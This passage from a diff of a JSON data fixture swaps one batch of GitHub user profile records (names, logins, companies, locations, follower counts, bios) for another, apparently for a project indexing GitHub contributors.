"2024-09-22T09:34:36.624Z", + "nest_updated_at": "2024-09-22T19:33:38.975Z", + "name": "Callum Styan", + "login": "cstyan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50097679?v=4", - "company": "", - "location": "makassar, indonesia", + "avatar_url": "https://avatars.githubusercontent.com/u/3246492?v=4", + "company": "@grafana ", + "location": "Vancouver, Canada", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2019-04-29T07:24:07Z", - "updated_at": "2024-08-22T16:30:04Z", - "node_id": "MDQ6VXNlcjUwMDk3Njc5", - "bio": " State Polytechnic of Ujung Pandang, Computer and Network Engineer 👾 || Beginner and Noob", + "following_count": 30, + "followers_count": 130, + "public_gists_count": 8, + "public_repositories_count": 49, + "created_at": "2013-01-11T17:50:47Z", + "updated_at": "2024-07-25T14:38:30Z", + "node_id": "MDQ6VXNlcjMyNDY0OTI=", + "bio": "cloud/distributed system things", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2273, + "pk": 7608, "fields": { - "nest_created_at": "2024-09-12T01:13:35.970Z", - "nest_updated_at": "2024-09-12T01:15:19.545Z", - "name": "Sébastien GLON", - "login": "sebglon", - "email": "sebglon@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3148666?v=4", - "company": "Ubble.ai", - "location": "Nantes", + "nest_created_at": "2024-09-22T09:34:36.962Z", + "nest_updated_at": "2024-09-22T19:33:39.288Z", + "name": "Casey Iiams-Hauser", + "login": "caseyi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5084220?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 2, - "followers_count": 5, - "public_gists_count": 7, - "public_repositories_count": 52, - "created_at": "2012-12-29T15:11:02Z", - "updated_at": "2024-08-16T11:21:15Z", - "node_id": "MDQ6VXNlcjMxNDg2NjY=", + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-07-24T20:23:29Z", + "updated_at": "2024-09-11T09:00:21Z", + "node_id": "MDQ6VXNlcjUwODQyMjA=", "bio": "", - "is_hireable": true, - "twitter_username": "SebastienGlon" + "is_hireable": false, + "twitter_username": "caseynth" } }, { "model": "github.user", - "pk": 2274, + "pk": 7609, "fields": { - "nest_created_at": "2024-09-12T01:13:37.393Z", - "nest_updated_at": "2024-09-12T01:13:37.393Z", - "name": "", - "login": "peeqonet", + "nest_created_at": "2024-09-22T09:34:37.276Z", + "nest_updated_at": "2024-09-22T19:33:39.594Z", + "name": "Jochen Schalanda", + "login": "joschi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/143388250?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43951?v=4", "company": "", - "location": "Fr", + "location": "Germany", "collaborators_count": 0, - "following_count": 24, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-08-28T07:49:26Z", - "updated_at": "2024-09-09T07:02:23Z", - "node_id": "U_kgDOCIvuWg", + "following_count": 9, + "followers_count": 260, + "public_gists_count": 12, + "public_repositories_count": 168, + "created_at": "2009-01-03T16:14:18Z", + "updated_at": "2024-09-22T11:24:18Z", + "node_id": "MDQ6VXNlcjQzOTUx", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "joschi83" } }, { "model": "github.user", - "pk": 2275, + "pk": 7610, "fields": { - "nest_created_at": "2024-09-12T01:13:40.371Z", - "nest_updated_at": "2024-09-12T01:13:40.371Z", - "name": "", - "login": "meytrix183", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31131698?v=4", + "nest_created_at": "2024-09-22T09:34:37.586Z", + "nest_updated_at": "2024-09-22T19:33:39.938Z", + "name": "Johan Abbors", + "login": "jabbors", + "email": "jabbors@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1805094?v=4", "company": "", - "location": "", + "location": "Vaasa, Finland", "collaborators_count": 0, - "following_count": 9, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 7, - "created_at": "2017-08-18T12:04:05Z", - "updated_at": "2024-09-09T09:12:41Z", - "node_id": "MDQ6VXNlcjMxMTMxNjk4", + "following_count": 0, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2012-06-01T11:55:09Z", + "updated_at": "2024-05-22T12:21:01Z", + "node_id": "MDQ6VXNlcjE4MDUwOTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417128,174 +676177,174 @@ }, { "model": "github.user", - "pk": 2276, + "pk": 7611, "fields": { - "nest_created_at": "2024-09-12T01:13:41.594Z", - "nest_updated_at": "2024-09-12T01:13:41.594Z", - "name": "Quirin Hardy Zießler", - "login": "quirinziessler", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19915467?v=4", + "nest_created_at": "2024-09-22T09:34:37.901Z", + "nest_updated_at": "2024-09-22T19:33:40.255Z", + "name": "Jon Banafato", + "login": "jonafato", + "email": "jon@jonafato.com", + "avatar_url": "https://avatars.githubusercontent.com/u/392720?v=4", "company": "", - "location": "", + "location": "New York", "collaborators_count": 0, - "following_count": 5, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2016-06-13T18:58:18Z", - "updated_at": "2024-08-26T19:03:39Z", - "node_id": "MDQ6VXNlcjE5OTE1NDY3", + "following_count": 0, + "followers_count": 60, + "public_gists_count": 3, + "public_repositories_count": 107, + "created_at": "2010-09-08T23:27:02Z", + "updated_at": "2024-05-23T19:12:21Z", + "node_id": "MDQ6VXNlcjM5MjcyMA==", "bio": "", "is_hireable": false, - "twitter_username": "zie_ler" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2277, + "pk": 7612, "fields": { - "nest_created_at": "2024-09-12T01:13:42.893Z", - "nest_updated_at": "2024-09-12T01:13:42.893Z", - "name": "Erdem Özgen", - "login": "ErdemOzgen", + "nest_created_at": "2024-09-22T09:34:38.209Z", + "nest_updated_at": "2024-09-22T19:33:40.599Z", + "name": "Jon Shier", + "login": "jshier", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14043035?v=4", - "company": "HAVELSAN", - "location": "Learning Land", + "avatar_url": "https://avatars.githubusercontent.com/u/51020?v=4", + "company": "Detroit Labs", + "location": "Rochester Hills, MI", "collaborators_count": 0, - "following_count": 340, - "followers_count": 181, - "public_gists_count": 9, - "public_repositories_count": 140, - "created_at": "2015-08-30T17:12:04Z", - "updated_at": "2024-08-25T11:29:27Z", - "node_id": "MDQ6VXNlcjE0MDQzMDM1", - "bio": "Software Developer and ML Enthusiast", + "following_count": 0, + "followers_count": 471, + "public_gists_count": 11, + "public_repositories_count": 57, + "created_at": "2009-02-02T04:01:34Z", + "updated_at": "2024-09-21T11:22:47Z", + "node_id": "MDQ6VXNlcjUxMDIw", + "bio": "Jon has been an Apple platforms developer for 20 years and currently works for Detroit Labs in Detroit, MI. He also serves on the Alamofire board of directors.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2278, + "pk": 7613, "fields": { - "nest_created_at": "2024-09-12T01:13:44.158Z", - "nest_updated_at": "2024-09-12T01:13:44.158Z", - "name": "Bilal Mirza", - "login": "bilalmirza74", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84387676?v=4", - "company": "", - "location": "hyd", + "nest_created_at": "2024-09-22T09:34:38.523Z", + "nest_updated_at": "2024-09-22T19:33:40.969Z", + "name": "Jonathan DEKHTIAR", + "login": "DEKHTIARJonathan", + "email": "jonathan@dekhtiar.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10923599?v=4", + "company": "@NVIDIA", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 67, - "created_at": "2021-05-18T11:58:36Z", - "updated_at": "2024-09-02T12:26:21Z", - "node_id": "MDQ6VXNlcjg0Mzg3Njc2", - "bio": ".", - "is_hireable": false, + "following_count": 87, + "followers_count": 125, + "public_gists_count": 28, + "public_repositories_count": 101, + "created_at": "2015-02-09T13:35:29Z", + "updated_at": "2024-09-18T16:50:37Z", + "node_id": "MDQ6VXNlcjEwOTIzNTk5", + "bio": "Senior Deep Learning Engineer.\r\nActive Open Source Contributor\r\n#ComputerVision #DeepLearning #OpenSource", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2279, + "pk": 7614, "fields": { - "nest_created_at": "2024-09-12T01:13:45.422Z", - "nest_updated_at": "2024-09-12T01:13:45.422Z", - "name": "Deep", - "login": "DeepRahangdale", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/115669089?v=4", - "company": "Indian Institute of Information Technology Kottayam", - "location": "Gondia, Maharashtra", + "nest_created_at": "2024-09-22T09:34:38.832Z", + "nest_updated_at": "2024-09-22T19:33:41.281Z", + "name": "Jose Montes de Oca", + "login": "josemontesdeoca", + "email": "jose@newslit.co", + "avatar_url": "https://avatars.githubusercontent.com/u/762541?v=4", + "company": "Newslit", + "location": "Miami, FL", "collaborators_count": 0, - "following_count": 6, - "followers_count": 3, + "following_count": 158, + "followers_count": 67, "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2022-10-12T21:38:06Z", - "updated_at": "2024-09-04T21:05:48Z", - "node_id": "U_kgDOBuT4YQ", - "bio": "SDE Intern'23 @TVS Sensing & Solution | Web Developer @digitomize[Microsoft for Startup Founder Hub] @TBD | Rust Enthusiast | Oracle Cloud Certified | IIITK'25", - "is_hireable": true, - "twitter_username": "DeepRahangdale1" + "public_repositories_count": 13, + "created_at": "2011-05-01T23:43:55Z", + "updated_at": "2024-09-16T23:42:11Z", + "node_id": "MDQ6VXNlcjc2MjU0MQ==", + "bio": "Co-founder @newslit + organizer @code-for-venezuela \r\n 🇻🇪 | Product/Entrepreneurship driven Engineer | Formerly \r\n@nuzzel, @AngelList, @google", + "is_hireable": false, + "twitter_username": "josemontesdeoca" } }, { "model": "github.user", - "pk": 2280, + "pk": 7615, "fields": { - "nest_created_at": "2024-09-12T01:13:46.756Z", - "nest_updated_at": "2024-09-12T01:16:02.692Z", - "name": "", - "login": "WojTecH94", + "nest_created_at": "2024-09-22T09:34:39.142Z", + "nest_updated_at": "2024-09-22T19:33:41.592Z", + "name": "Josh Lee", + "login": "realJoshLee", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19763370?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38728523?v=4", "company": "", - "location": "", + "location": "United States", "collaborators_count": 0, - "following_count": 0, + "following_count": 4, "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-06-05T16:52:53Z", - "updated_at": "2024-08-16T09:56:39Z", - "node_id": "MDQ6VXNlcjE5NzYzMzcw", - "bio": "", + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2018-04-25T14:28:25Z", + "updated_at": "2024-09-13T14:41:30Z", + "node_id": "MDQ6VXNlcjM4NzI4NTIz", + "bio": "Networking Engineer, Information Technology Administrator, Cyber Security & Computer Networking Student.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "realjoshlee0" } }, { "model": "github.user", - "pk": 2281, + "pk": 7616, "fields": { - "nest_created_at": "2024-09-12T01:13:49.442Z", - "nest_updated_at": "2024-09-12T01:13:49.443Z", - "name": "", - "login": "anetafa", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/143069544?v=4", + "nest_created_at": "2024-09-22T09:34:39.452Z", + "nest_updated_at": "2024-09-22T19:33:41.911Z", + "name": "Justin", + "login": "ItsAGeekThing", + "email": "jrharper@pm.me", + "avatar_url": "https://avatars.githubusercontent.com/u/7245209?v=4", "company": "", - "location": "", + "location": "Asheville, NC", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-08-24T07:17:27Z", - "updated_at": "2024-06-12T13:19:58Z", - "node_id": "U_kgDOCIcRaA", - "bio": "", + "public_gists_count": 2, + "public_repositories_count": 9, + "created_at": "2014-04-10T00:55:32Z", + "updated_at": "2024-08-20T16:32:12Z", + "node_id": "MDQ6VXNlcjcyNDUyMDk=", + "bio": "Just another person with a fascination of how the world works behind the scenes.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2282, + "pk": 7617, "fields": { - "nest_created_at": "2024-09-12T01:13:50.718Z", - "nest_updated_at": "2024-09-12T01:13:50.718Z", - "name": "", - "login": "JoBaBe", + "nest_created_at": "2024-09-22T09:34:39.761Z", + "nest_updated_at": "2024-09-22T19:33:42.262Z", + "name": "Justin Obara", + "login": "jobara", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28590541?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/556024?v=4", + "company": "Inclusive Design Resource Centre, OCAD University", + "location": "Toronto, Ontario", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-05-10T08:02:15Z", - "updated_at": "2023-11-13T08:25:07Z", - "node_id": "MDQ6VXNlcjI4NTkwNTQx", + "following_count": 19, + "followers_count": 26, + "public_gists_count": 10, + "public_repositories_count": 140, + "created_at": "2011-01-10T18:03:43Z", + "updated_at": "2024-09-13T17:46:35Z", + "node_id": "MDQ6VXNlcjU1NjAyNA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417303,74 +676352,74 @@ }, { "model": "github.user", - "pk": 2283, + "pk": 7618, "fields": { - "nest_created_at": "2024-09-12T01:13:52.080Z", - "nest_updated_at": "2024-09-12T01:13:52.080Z", - "name": "Michał Winciorek", - "login": "Wincioor11", + "nest_created_at": "2024-09-22T09:34:40.081Z", + "nest_updated_at": "2024-09-22T19:33:42.581Z", + "name": "Kelle Cruz", + "login": "kelle", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38164733?v=4", - "company": "Netcompany", - "location": "Warsaw", + "avatar_url": "https://avatars.githubusercontent.com/u/1444249?v=4", + "company": "CUNY Hunter College", + "location": "New York, NY, USA", "collaborators_count": 0, - "following_count": 4, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2018-04-07T18:12:40Z", - "updated_at": "2024-08-05T15:27:23Z", - "node_id": "MDQ6VXNlcjM4MTY0NzMz", - "bio": "Machine Learning, Software Development, and DevOps.", + "following_count": 2, + "followers_count": 49, + "public_gists_count": 1, + "public_repositories_count": 51, + "created_at": "2012-02-16T19:00:11Z", + "updated_at": "2024-09-20T17:56:42Z", + "node_id": "MDQ6VXNlcjE0NDQyNDk=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2284, + "pk": 7619, "fields": { - "nest_created_at": "2024-09-12T01:13:54.686Z", - "nest_updated_at": "2024-09-12T01:13:54.686Z", - "name": "", - "login": "nedakheiri", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/102523375?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:40.410Z", + "nest_updated_at": "2024-09-22T19:33:42.891Z", + "name": "Kelly Burke", + "login": "klyburke", + "email": "kellyburke101@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26158226?v=4", + "company": "Work In Biotech LLC", + "location": "Northeastern WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-03-28T11:27:47Z", - "updated_at": "2024-09-01T14:56:45Z", - "node_id": "U_kgDOBhxh7w", - "bio": "", + "following_count": 18, + "followers_count": 268, + "public_gists_count": 19, + "public_repositories_count": 20, + "created_at": "2017-03-03T06:13:10Z", + "updated_at": "2024-08-17T05:58:57Z", + "node_id": "MDQ6VXNlcjI2MTU4MjI2", + "bio": "workinbiotech.com, builderbook.org", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2285, + "pk": 7620, "fields": { - "nest_created_at": "2024-09-12T01:13:59.985Z", - "nest_updated_at": "2024-09-12T01:16:01.383Z", - "name": "", - "login": "testaccount90009", + "nest_created_at": "2024-09-22T09:34:40.762Z", + "nest_updated_at": "2024-09-22T19:33:43.204Z", + "name": "Kriszta Matyi", + "login": "matyikriszta", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122134756?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5873816?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-01-07T01:39:40Z", - "updated_at": "2024-08-12T16:27:06Z", - "node_id": "U_kgDOB0eg5A", + "public_repositories_count": 37, + "created_at": "2013-11-06T21:09:32Z", + "updated_at": "2023-09-25T07:31:48Z", + "node_id": "MDQ6VXNlcjU4NzM4MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417378,49 +676427,74 @@ }, { "model": "github.user", - "pk": 2286, + "pk": 7621, "fields": { - "nest_created_at": "2024-09-12T01:14:01.272Z", - "nest_updated_at": "2024-09-12T01:14:01.272Z", - "name": "", - "login": "ahammoudeh96", + "nest_created_at": "2024-09-22T09:34:41.072Z", + "nest_updated_at": "2024-09-22T19:33:43.515Z", + "name": "Kyle Wood", + "login": "DenWav", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/152085366?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1332104?v=4", + "company": "@Backblaze", + "location": "Space", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-26T16:09:20Z", - "updated_at": "2023-11-26T16:09:20Z", - "node_id": "U_kgDOCRCjdg", - "bio": "", + "following_count": 1, + "followers_count": 93, + "public_gists_count": 53, + "public_repositories_count": 48, + "created_at": "2012-01-15T19:52:10Z", + "updated_at": "2024-09-21T02:04:07Z", + "node_id": "MDQ6VXNlcjEzMzIxMDQ=", + "bio": "Lover of cats and Taylor Swift.", + "is_hireable": false, + "twitter_username": "DenWav" + } +}, +{ + "model": "github.user", + "pk": 7622, + "fields": { + "nest_created_at": "2024-09-22T09:34:41.414Z", + "nest_updated_at": "2024-09-22T19:33:43.829Z", + "name": "Larsen Vallecillo", + "login": "larsenv", + "email": "larsenv293@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4673969?v=4", + "company": "@RiiConnect24 ", + "location": "Texas", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 132, + "public_gists_count": 15, + "public_repositories_count": 103, + "created_at": "2013-06-11T20:58:05Z", + "updated_at": "2024-09-20T11:29:43Z", + "node_id": "MDQ6VXNlcjQ2NzM5Njk=", + "bio": "I created RiiConnect24", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2287, + "pk": 7623, "fields": { - "nest_created_at": "2024-09-12T01:14:02.103Z", - "nest_updated_at": "2024-09-12T01:15:39.409Z", - "name": "Trần Ngọc Nam", - "login": "tsukiazuma", + "nest_created_at": "2024-09-22T09:34:41.733Z", + "nest_updated_at": "2024-09-22T19:33:44.150Z", + "name": "Lily Williams", + "login": "runt2pb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75791054?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/29760224?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2020-12-10T12:57:14Z", - "updated_at": "2024-01-29T09:36:17Z", - "node_id": "MDQ6VXNlcjc1NzkxMDU0", + "public_repositories_count": 2, + "created_at": "2017-06-28T18:14:18Z", + "updated_at": "2021-12-02T19:50:04Z", + "node_id": "MDQ6VXNlcjI5NzYwMjI0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417428,199 +676502,224 @@ }, { "model": "github.user", - "pk": 2288, + "pk": 7624, "fields": { - "nest_created_at": "2024-09-12T01:14:02.963Z", - "nest_updated_at": "2024-09-12T01:14:02.963Z", - "name": "BoBeR182", - "login": "BoBeR182", + "nest_created_at": "2024-09-22T09:34:42.039Z", + "nest_updated_at": "2024-09-22T19:33:44.464Z", + "name": "Lorenzo Fontana", + "login": "fntlnz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/525433?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3083633?v=4", "company": "", - "location": "Antarctica", + "location": "Alps", "collaborators_count": 0, - "following_count": 0, - "followers_count": 16, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2010-12-16T06:44:51Z", - "updated_at": "2024-09-07T22:25:13Z", - "node_id": "MDQ6VXNlcjUyNTQzMw==", + "following_count": 28, + "followers_count": 589, + "public_gists_count": 28, + "public_repositories_count": 100, + "created_at": "2012-12-19T19:34:19Z", + "updated_at": "2024-07-23T09:57:56Z", + "node_id": "MDQ6VXNlcjMwODM2MzM=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "fntlnz" } }, { "model": "github.user", - "pk": 2289, + "pk": 7625, "fields": { - "nest_created_at": "2024-09-12T01:14:04.208Z", - "nest_updated_at": "2024-09-12T01:14:04.208Z", - "name": "Jeremy Bonghwan Choi", - "login": "jeremychoi", - "email": "jechoi@redhat.com", - "avatar_url": "https://avatars.githubusercontent.com/u/25311915?v=4", - "company": "Red Hat", + "nest_created_at": "2024-09-22T09:34:42.352Z", + "nest_updated_at": "2024-09-22T19:33:44.813Z", + "name": "Luis Ángel San Martín", + "login": "luisangelsm", + "email": "luisangelsm@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1395876?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 42, - "created_at": "2017-01-24T00:40:08Z", - "updated_at": "2024-07-04T03:18:19Z", - "node_id": "MDQ6VXNlcjI1MzExOTE1", - "bio": "Red Hat Product Security engineer, Security Research team lead", + "following_count": 0, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2012-01-31T21:25:52Z", + "updated_at": "2024-08-31T12:53:35Z", + "node_id": "MDQ6VXNlcjEzOTU4NzY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2290, + "pk": 7626, "fields": { - "nest_created_at": "2024-09-12T01:14:05.487Z", - "nest_updated_at": "2024-09-12T01:14:05.487Z", - "name": "", - "login": "ninp0", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1008583?v=4", - "company": "0day Inc.", - "location": "", + "nest_created_at": "2024-09-22T09:34:42.692Z", + "nest_updated_at": "2024-09-22T19:33:45.141Z", + "name": "Edward Loveall", + "login": "edwardloveall", + "email": "edward@edwardloveall.com", + "avatar_url": "https://avatars.githubusercontent.com/u/49549?v=4", + "company": "", + "location": "Massachusetts", "collaborators_count": 0, - "following_count": 59, - "followers_count": 20, - "public_gists_count": 218, - "public_repositories_count": 24, - "created_at": "2011-08-27T14:46:57Z", - "updated_at": "2024-04-09T17:52:05Z", - "node_id": "MDQ6VXNlcjEwMDg1ODM=", - "bio": "Twitter: https://twitter.com/ninp0", + "following_count": 1, + "followers_count": 114, + "public_gists_count": 45, + "public_repositories_count": 152, + "created_at": "2009-01-27T06:02:24Z", + "updated_at": "2024-08-31T22:56:37Z", + "node_id": "MDQ6VXNlcjQ5NTQ5", + "bio": "Web Developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2291, + "pk": 7627, "fields": { - "nest_created_at": "2024-09-12T01:14:06.739Z", - "nest_updated_at": "2024-09-12T01:14:06.739Z", - "name": "Nguyen Dinh Bien", - "login": "biennd279", + "nest_created_at": "2024-09-22T09:34:43.008Z", + "nest_updated_at": "2024-09-22T19:33:45.470Z", + "name": "Edward Thomson", + "login": "ethomson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44922242?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1130014?v=4", + "company": "Stacklok", + "location": "Cambridge, UK", "collaborators_count": 0, - "following_count": 19, - "followers_count": 13, - "public_gists_count": 1, - "public_repositories_count": 47, - "created_at": "2018-11-10T11:48:54Z", - "updated_at": "2024-08-31T16:05:20Z", - "node_id": "MDQ6VXNlcjQ0OTIyMjQy", - "bio": "", + "following_count": 2, + "followers_count": 1632, + "public_gists_count": 35, + "public_repositories_count": 171, + "created_at": "2011-10-15T14:05:12Z", + "updated_at": "2024-09-20T22:44:08Z", + "node_id": "MDQ6VXNlcjExMzAwMTQ=", + "bio": "Product at @Stacklok; maintainer of @libgit2. Formerly product and engineering at @Vercel, @GitHub, @Microsoft.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ethomson" } }, { "model": "github.user", - "pk": 2292, + "pk": 7628, "fields": { - "nest_created_at": "2024-09-12T01:14:07.992Z", - "nest_updated_at": "2024-09-12T01:14:48.804Z", - "name": "Stephan Pillhofer", - "login": "StephanPillhofer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43667664?v=4", - "company": "", - "location": "Austria", + "nest_created_at": "2024-09-22T09:34:43.321Z", + "nest_updated_at": "2024-09-22T19:33:45.790Z", + "name": "Eric J. Smith", + "login": "ejsmith", + "email": "eric@exceptionless.com", + "avatar_url": "https://avatars.githubusercontent.com/u/282584?v=4", + "company": "@exceptionless @slideroom", + "location": "Dallas, TX", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-09-28T07:45:55Z", - "updated_at": "2024-09-11T15:13:26Z", - "node_id": "MDQ6VXNlcjQzNjY3NjY0", - "bio": "", - "is_hireable": false, + "following_count": 117, + "followers_count": 137, + "public_gists_count": 19, + "public_repositories_count": 56, + "created_at": "2010-05-20T17:02:46Z", + "updated_at": "2024-09-19T18:19:09Z", + "node_id": "MDQ6VXNlcjI4MjU4NA==", + "bio": "Founder of @exceptionless and @codesmithtools,\r\nSoftware Architect @slideroom, @FoundatioFx", + "is_hireable": true, + "twitter_username": "ejsmith" + } +}, +{ + "model": "github.user", + "pk": 7629, + "fields": { + "nest_created_at": "2024-09-22T09:34:43.651Z", + "nest_updated_at": "2024-09-22T19:33:46.105Z", + "name": "Erin McKean", + "login": "emckean", + "email": "erin@logocracy.com", + "avatar_url": "https://avatars.githubusercontent.com/u/225433?v=4", + "company": "@wordnik ", + "location": "Portland OR", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 156, + "public_gists_count": 22, + "public_repositories_count": 92, + "created_at": "2010-03-18T16:10:58Z", + "updated_at": "2024-07-29T22:36:51Z", + "node_id": "MDQ6VXNlcjIyNTQzMw==", + "bio": "full Stack-Overflow developer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2293, + "pk": 7630, "fields": { - "nest_created_at": "2024-09-12T01:14:10.552Z", - "nest_updated_at": "2024-09-12T01:14:10.552Z", - "name": "Tanvi Patil", - "login": "tpat13", + "nest_created_at": "2024-09-22T09:34:43.972Z", + "nest_updated_at": "2024-09-22T19:33:46.423Z", + "name": "Ievgen Pyrogov", + "login": "gmile", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32806320?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/207112?v=4", + "company": "@contractbook", + "location": "Zurich", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2017-10-15T02:03:33Z", - "updated_at": "2024-04-01T12:30:06Z", - "node_id": "MDQ6VXNlcjMyODA2MzIw", - "bio": "Just a little guy", + "following_count": 68, + "followers_count": 108, + "public_gists_count": 16, + "public_repositories_count": 104, + "created_at": "2010-02-20T01:34:45Z", + "updated_at": "2024-09-07T20:50:24Z", + "node_id": "MDQ6VXNlcjIwNzExMg==", + "bio": "Lead infrastructure engineer @Contractbook ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "gmile" } }, { "model": "github.user", - "pk": 2294, + "pk": 7631, "fields": { - "nest_created_at": "2024-09-12T01:14:11.811Z", - "nest_updated_at": "2024-09-12T01:14:11.811Z", - "name": "James Luther", - "login": "james-luther", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81767471?v=4", - "company": "@colibrisec", - "location": "Solidaridad, Q.R.", + "nest_created_at": "2024-09-22T09:34:44.296Z", + "nest_updated_at": "2024-09-22T19:33:46.749Z", + "name": "Florian Harwoeck", + "login": "harwoeck", + "email": "florian@harwoeck.at", + "avatar_url": "https://avatars.githubusercontent.com/u/16159211?v=4", + "company": "", + "location": "Austria", "collaborators_count": 0, - "following_count": 5, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 12, - "created_at": "2021-04-01T16:10:22Z", - "updated_at": "2024-08-10T20:10:32Z", - "node_id": "MDQ6VXNlcjgxNzY3NDcx", - "bio": "Cybersecurity Professional", - "is_hireable": true, + "following_count": 75, + "followers_count": 45, + "public_gists_count": 4, + "public_repositories_count": 18, + "created_at": "2015-12-04T22:14:08Z", + "updated_at": "2024-09-20T11:39:25Z", + "node_id": "MDQ6VXNlcjE2MTU5MjEx", + "bio": "Law student from Austria ⚖️ 🇦🇹. (Software&Security) Engineer. Gopher.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2295, + "pk": 7632, "fields": { - "nest_created_at": "2024-09-12T01:14:17.442Z", - "nest_updated_at": "2024-09-12T01:14:17.442Z", - "name": "szEvEz", - "login": "szEvEz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17480438?v=4", + "nest_created_at": "2024-09-22T09:34:44.626Z", + "nest_updated_at": "2024-09-22T19:33:47.070Z", + "name": "G. Hussain Chinoy", + "login": 